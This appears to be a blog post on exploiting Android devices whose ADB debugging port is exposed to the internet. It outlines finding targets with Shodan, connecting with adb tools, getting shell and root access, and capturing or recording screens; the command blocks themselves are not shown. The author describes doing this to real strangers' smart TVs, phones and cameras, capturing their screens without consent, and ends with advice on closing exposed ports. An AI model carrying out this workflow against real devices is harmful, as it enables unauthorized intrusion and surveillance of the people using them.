Getting Shell Access to ADB Exposed Smart Devices π²πΊβ
Exploiting Exposed ADB ports to get shell access to various smart devices such as smart tvs, cameras, etc.
Introduction
ADB is being used widely by android community developers to debug android apps and perform several other tasks such as to push/pull files between android & pc, install applications, enabling/disabling verity checks, execute commands, rooting device, etc.
I love CLI so I prefer using CLI commands over UI and ADB provides me shell access where I can run commands. It also has feature to expose TCP port allowing users to connect over LAN, but what if this local port is somehow exposed to the Internet allowing anyone to connect to the device via exposed adb port 5555 .
Since Android is an open source project, most of the companies create their custom version of android images which drive their products. There are high chances that smart device is running android or its variant, supporting ADB connection.
Can a malicious user connect to such exposed device??
Using Shodan To Find Exposed Devices
Finding devices using search
There are several devices connected to the Internet with exposed ADB port. Most of these devices are misconfigured allowing anyone to connect to these devices.
Installing ADB Tools For Connecting To A Remote Device
Install adb tools on debian based distro
Start server and connect to device
Some devices don't accept connection. Try another IP if you're unable to connect to the device.
I successfully got shell access to one of the exposed device.
Getting a shell access is one of the basic step for pivoting, attacker once gets shell access they usually try to privilege escalate the device then try to compromise other devices on the network. Attacker still can damage the system by uploading malicious/spyware application. As PoC I'll be capturing user's screen using shell access.
Let's try to find rooted devices on the Internet. Rooted devices provides complete control over the device to the attacker.
Got Device with Root Accessπ
Capturing Screenshots and Recording Screen
Capturing Screenshot and Storing on Attacker's machine
Image will be stored in current directory as screen.png
Capturing Screen and Pulling File on Local Machine
Above commands will capture screen for 10s, download file to local machine in current working directory then delete file.
Using Above Commands and Capturing Screenshots
Above images are captured from devices exposed to the Internet and using ADB to get access where user's are browsing web, watching shows, playing games, etc. But I encountered a ransomware infected machine asking victim for $100 to bitcoin address.
Since, ADB port is exposed to the internet anyone can connect to the device over the internet and install ransomware application.
On searching for Nanoware Ransomware I couldn't find any traces of such ransomware over the internet. Though we cannot trust messages saying that "SORRY I have to feed my family", since it could be social engineering technique luring victim into paying low value ransom. But I think this attack isn't carried out by a ransomware gang but it should be an individual or it could be initial stage of the gang experimenting something.
Conclusion
There are several devices connected to the internet with their adb exposed to the internet allowing attacker to connect, execute commands, installing applications, capturing screen, etc. Among which most of the devices included Smart TVs, Smart TV boxes, Smart phones and Smart Cameras.
Users should close their adb connection after usage. Devices with adb port open shouldn't be exposed to internet, individuals should use VPN network such as wireguard/openvpn to create a secure network and connect to the device remotely.
Last updated
